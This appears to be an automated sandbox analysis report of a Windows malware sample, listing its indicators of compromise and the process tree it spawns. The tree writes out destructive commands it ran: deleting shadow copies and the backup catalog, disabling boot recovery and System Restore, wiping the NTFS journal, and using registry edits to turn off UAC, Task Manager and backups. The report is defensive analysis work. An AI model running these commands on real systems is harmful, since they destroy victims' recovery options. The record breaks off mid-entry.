1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeBackupPrivilege	4968	vssvc.exe
Token: SeRestorePrivilege	4968	vssvc.exe
Token: SeAuditPrivilege	4968	vssvc.exe
Token: SeBackupPrivilege	4520	wbengine.exe
Token: SeRestorePrivilege	4520	wbengine.exe
Token: SeSecurityPrivilege	4520	wbengine.exe
Token: SeAuditPrivilege	564	svchost.exe
Token: SeAuditPrivilege	564	svchost.exe
Token: SeAuditPrivilege	564	svchost.exe
Token: SeAuditPrivilege	564	svchost.exe
Token: SeAuditPrivilege	564	svchost.exe
Token: SeAuditPrivilege	564	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1716 wrote to memory of 4488	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 1716 wrote to memory of 4488	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 1716 wrote to memory of 4488	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	83
PID 1716 wrote to memory of 4952	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	84
PID 1716 wrote to memory of 4952	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	84
PID 1716 wrote to memory of 4952	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	84
PID 1716 wrote to memory of 520	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	85
PID 1716 wrote to memory of 520	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	85
PID 1716 wrote to memory of 520	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	85
PID 520 wrote to memory of 4876	520	cmd.exe	86
PID 520 wrote to memory of 4876	520	cmd.exe	86
PID 520 wrote to memory of 4876	520	cmd.exe	86
PID 1716 wrote to memory of 4220	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	87
PID 1716 wrote to memory of 4220	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	87
PID 1716 wrote to memory of 4220	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	87
PID 1716 wrote to memory of 1436	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	88
PID 1716 wrote to memory of 1436	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	88
PID 1716 wrote to memory of 1080	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	92
PID 1716 wrote to memory of 1080	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	92
PID 1716 wrote to memory of 3396	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	90
PID 1716 wrote to memory of 3396	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	90
PID 1716 wrote to memory of 820	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	94
PID 1716 wrote to memory of 820	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	94
PID 1716 wrote to memory of 1516	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	96
PID 1716 wrote to memory of 1516	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	96
PID 1716 wrote to memory of 3176	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	98
PID 1716 wrote to memory of 3176	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	98
PID 1716 wrote to memory of 2016	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	102
PID 1716 wrote to memory of 2016	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	102
PID 1716 wrote to memory of 2484	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	101
PID 1716 wrote to memory of 2484	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	101
PID 1716 wrote to memory of 3476	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	100
PID 1716 wrote to memory of 3476	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	100
PID 1716 wrote to memory of 112	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	109
PID 1716 wrote to memory of 112	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	109
PID 1716 wrote to memory of 3512	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	107
PID 1716 wrote to memory of 3512	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	107
PID 1716 wrote to memory of 3964	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	105
PID 1716 wrote to memory of 3964	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	105
PID 1080 wrote to memory of 3140	1080	cmd.exe	111
PID 1080 wrote to memory of 3140	1080	cmd.exe	111
PID 1436 wrote to memory of 3844	1436	cmd.exe	112
PID 1436 wrote to memory of 3844	1436	cmd.exe	112
PID 1716 wrote to memory of 1344	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	113
PID 1716 wrote to memory of 1344	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	113
PID 2016 wrote to memory of 880	2016	cmd.exe	115
PID 2016 wrote to memory of 880	2016	cmd.exe	115
PID 3176 wrote to memory of 5020	3176	cmd.exe	116
PID 3176 wrote to memory of 5020	3176	cmd.exe	116
PID 1716 wrote to memory of 2340	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	117
PID 1716 wrote to memory of 2340	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	117
PID 1716 wrote to memory of 1784	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	119
PID 1716 wrote to memory of 1784	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	119
PID 1716 wrote to memory of 1468	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	124
PID 1716 wrote to memory of 1468	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	124
PID 3396 wrote to memory of 4484	3396	cmd.exe	125
PID 3396 wrote to memory of 4484	3396	cmd.exe	125
PID 1716 wrote to memory of 4264	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	122
PID 1716 wrote to memory of 4264	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	122
PID 1716 wrote to memory of 3584	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	121
PID 1716 wrote to memory of 3584	1716	abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe	121
PID 820 wrote to memory of 1572	820	cmd.exe	128
PID 820 wrote to memory of 1572	820	cmd.exe	128
PID 2484 wrote to memory of 3080	2484	cmd.exe	130

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
5108	attrib.exe
4844	attrib.exe

C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
"C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:4952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:520
- - C:\Windows\SysWOW64\chcp.com
    chcp 437
    3⤵
    PID:4876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:4220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3396
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4484
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  PID:1516
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3176
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  PID:3476
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    - Deletes NTFS Change Journal
    PID:3760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  PID:3964
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:1644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:3512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:364
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:112
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:2632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:1344
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:2340
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1784
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:2656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3584
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:4264
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:1468
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:4032
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:2028
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:2088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:4780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:4244
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:4980
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:2476
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:3928
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:3544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:528
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:2772
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:2556
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Enumerates connected drives
    PID:5648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:2100
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:4912
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:4944
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:4772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:4500
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:4948
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:3840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:1232
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4048
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:5388
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:5108
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:6100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:4216
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
  2⤵
  PID:704
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:4148
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:6116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
  2⤵
  PID:3664
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:3620
- - C:\Windows\system32\reg.exe
